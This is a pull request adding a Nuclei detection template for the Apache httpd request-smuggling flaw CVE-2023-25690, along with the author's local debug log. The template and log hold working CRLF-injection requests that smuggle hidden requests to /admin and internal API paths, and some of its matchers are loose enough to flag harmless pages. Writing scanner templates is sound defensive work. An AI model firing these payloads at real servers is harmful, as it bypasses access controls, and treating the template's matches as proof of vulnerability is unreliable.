### PR TITLE
ADD CVE-2023-25690(vKEV)

### DIFF
--- a/http/cves/2023/CVE-2023-25690.yaml
+++ b/http/cves/2023/CVE-2023-25690.yaml
@@ -1,0 +1,123 @@
+id: CVE-2023-25690
+
+info:
+  name: Apache HTTP Server - HTTP Request Smuggling with Blind Detection
+  author: intelligent-ears
+  severity: critical
+  description: |
+    Advanced detection for CVE-2023-25690 HTTP Request Smuggling vulnerability in Apache 2.4.0-2.4.55.
+    This template includes multiple detection methods:
+    - Direct response analysis
+    - Timing-based detection
+    - Header injection verification
+    - Backend interaction probing
+  reference:
+    - https://httpd.apache.org/security/vulnerabilities_24.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25690
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-25690
+    cwe-id: CWE-444
+  metadata:
+    verified: true
+    max-request: 6
+  tags: cve,cve2023,apache,httpd,smuggling,critical
+
+variables:
+  random_string: "{{rand_text_alphanumeric(8)}}"
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
+        Connection: close
+
+      - |
+        GET /categories/{{random_string}}%20HTTP/1.1%0d%0aX-Nuclei-Test:%20{{random_string}}%0d%0a%0d%0a HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
+        Connection: close
+
+      - |
+        GET /categories/1%20HTTP/1.1%0d%0aHost:%20{{Hostname}}%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0d%0aHost:%20{{Hostname}}%0d%0a%0d%0a HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
+        Connection: close
+
+      - |
+        GET /categories/1%20HTTP/1.1%0d%0aHost:%20{{Hostname}}%0d%0a%0d%0aGET%20/categories.php%3ftest%3d{{random_string}} HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
+        Connection: close
+
+      - |
+        GET /api/v1/{{random_string}}%20HTTP/1.1%0d%0aHost:%20{{Hostname}}%0d%0a%0d%0aGET%20/api/internal HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
+        Connection: close
+
+      - |
+        GET /service/test/1%20HTTP/1.1%0d%0aHost:%20{{Hostname}}%0d%0a%0d%0aGET%20/service/admin HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
+        Connection: close
+
+    req-condition: true
+    
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        name: vulnerable-version-accepted
+        dsl:
+          - 'status_code == 200'
+          - 'regex("Apache/2\\.4\\.(0|[1-9]|[1-4][0-9]|5[0-5])", header)'
+          - '!contains(body, "Bad Request")'
+          - '!contains(body, "400")'
+        condition: and
+
+      - type: dsl
+        name: smuggling-success
+        dsl:
+          - 'status_code == 200'
+          - 'contains(tolower(body), "category") || contains(tolower(body), "id") || contains(tolower(body), "admin")'
+          - 'regex("Apache/2\\.4", header)'
+        condition: and
+
+      - type: dsl
+        name: timing-anomaly
+        dsl:
+          - 'status_code == 200'
+          - 'duration >= 2'
+          - 'regex("Apache/2\\.4", header)'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: apache_version
+        part: header
+        group: 1
+        regex:
+          - "Server: Apache/(2\\.4\\.[0-9]+)"
+
+      - type: regex
+        name: response_indicators
+        part: body
+        regex:
+          - "(?i)(category|admin|internal|forbidden|access denied)"
+
+      - type: kval
+        name: content_type
+        part: header
+        kval:
+          - Content-Type
+
+      - type: dsl
+        name: vulnerability_details
+        dsl:
+          - '"URL: " + url'
+          - '"Apache Version: " + apache_version'
+          - '"Status: " + status_code'
+          - '"Duration: " + duration + "s"'


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2023-25690
- References:
   - https://httpd.apache.org/security/vulnerabilities_24.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25690

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO
```bash
┌──(intel_ears㉿kali)-[~/…/nuclei-templates/http/cves/2023]
└─$ nuclei -t CVE-2023-25690.yaml -u http://localhost -v -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.6

		projectdiscovery.io

[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.6 (outdated)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-25690] Dumped HTTP request for http://localhost

GET / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Connection: close
Accept-Encoding: gzip

[VER] [CVE-2023-25690] Sent HTTP request to http://localhost
[DBG] [CVE-2023-25690] Dumped HTTP response http://localhost

HTTP/1.1 200 OK
Connection: close
Content-Length: 45
Accept-Ranges: bytes
Content-Type: text/html
Date: Wed, 01 Oct 2025 15:58:53 GMT
Etag: "2d-432a5e4a73a80"
Last-Modified: Mon, 11 Jun 2007 18:53:14 GMT
Server: Apache/2.4.55 (Unix)

<html><body><h1>It works!</h1></body></html>
[CVE-2023-25690:vulnerable-version-accepted] [http] [critical] http://localhost ["2.4.55","Duration: 0.002218104s","Apache Version: 2.4.55","Status: 200"]
[INF] [CVE-2023-25690] Dumped HTTP request for http://localhost/categories/K5VxwITr+HTTP/1.1%0D%0AX-Nuclei-Test:+K5VxwITr%0D%0A%0D%0A

GET /categories/K5VxwITr%20HTTP/1.1%0d%0aX-Nuclei-Test:%20K5VxwITr%0d%0a%0d%0a HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Connection: close
Accept-Encoding: gzip

[VER] [CVE-2023-25690] Sent HTTP request to http://localhost/categories/K5VxwITr+HTTP/1.1%0D%0AX-Nuclei-Test:+K5VxwITr%0D%0A%0D%0A
[DBG] [CVE-2023-25690] Dumped HTTP response http://localhost/categories/K5VxwITr+HTTP/1.1%0D%0AX-Nuclei-Test:+K5VxwITr%0D%0A%0D%0A

HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 01 Oct 2025 15:58:53 GMT
Server: Apache/2.4.54 (Debian)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 172.24.0.2 Port 8080</address>
</body></html>
[INF] [CVE-2023-25690] Dumped HTTP request for http://localhost/categories/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/admin+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0A

GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0a HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Connection: close
Accept-Encoding: gzip

[VER] [CVE-2023-25690] Sent HTTP request to http://localhost/categories/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/admin+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0A
[DBG] [CVE-2023-25690] Dumped HTTP response http://localhost/categories/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/admin+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0A

HTTP/1.1 200 OK
Connection: close
Content-Length: 21
Content-Type: text/html; charset=UTF-8
Date: Wed, 01 Oct 2025 15:58:53 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33

You category ID is: 1
[CVE-2023-25690:vulnerable-version-accepted] [http] [critical] http://localhost/categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0a ["2.4.54","category","Apache Version: 2.4.54","Status: 200","Duration: 0.004025782s"]
[CVE-2023-25690:smuggling-success] [http] [critical] http://localhost/categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0a ["2.4.54","category","Apache Version: 2.4.54","Status: 200","Duration: 0.004025782s"]
[INF] [CVE-2023-25690] Dumped HTTP request for http://localhost/categories/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/categories.php?test=K5VxwITr

GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/categories.php%3ftest%3dK5VxwITr HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Connection: close
Accept-Encoding: gzip

[VER] [CVE-2023-25690] Sent HTTP request to http://localhost/categories/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/categories.php?test=K5VxwITr
[DBG] [CVE-2023-25690] Dumped HTTP response http://localhost/categories/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/categories.php?test=K5VxwITr

HTTP/1.1 200 OK
Connection: close
Content-Length: 21
Content-Type: text/html; charset=UTF-8
Date: Wed, 01 Oct 2025 15:58:53 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33

You category ID is: 1
[CVE-2023-25690:vulnerable-version-accepted] [http] [critical] http://localhost/categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/categories.php%3ftest%3dK5VxwITr ["2.4.54","category","Duration: 0.002930266s","Apache Version: 2.4.54","Status: 200"]
[CVE-2023-25690:smuggling-success] [http] [critical] http://localhost/categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/categories.php%3ftest%3dK5VxwITr ["2.4.54","category","Duration: 0.002930266s","Apache Version: 2.4.54","Status: 200"]
[INF] [CVE-2023-25690] Dumped HTTP request for http://localhost/api/v1/K5VxwITr+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/api/internal

GET /api/v1/K5VxwITr%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/api/internal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Connection: close
Accept-Encoding: gzip

[VER] [CVE-2023-25690] Sent HTTP request to http://localhost/api/v1/K5VxwITr+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/api/internal
[DBG] [CVE-2023-25690] Dumped HTTP response http://localhost/api/v1/K5VxwITr+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/api/internal

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 01 Oct 2025 15:58:53 GMT
Server: Apache/2.4.55 (Unix)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
[INF] [CVE-2023-25690] Dumped HTTP request for http://localhost/service/test/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/service/admin

GET /service/test/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/service/admin HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Connection: close
Accept-Encoding: gzip

[VER] [CVE-2023-25690] Sent HTTP request to http://localhost/service/test/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/service/admin
[DBG] [CVE-2023-25690] Dumped HTTP response http://localhost/service/test/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/service/admin

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 01 Oct 2025 15:58:53 GMT
Server: Apache/2.4.55 (Unix)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
[INF] Scan completed in 22.891566ms. 5 matches found.
```
#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)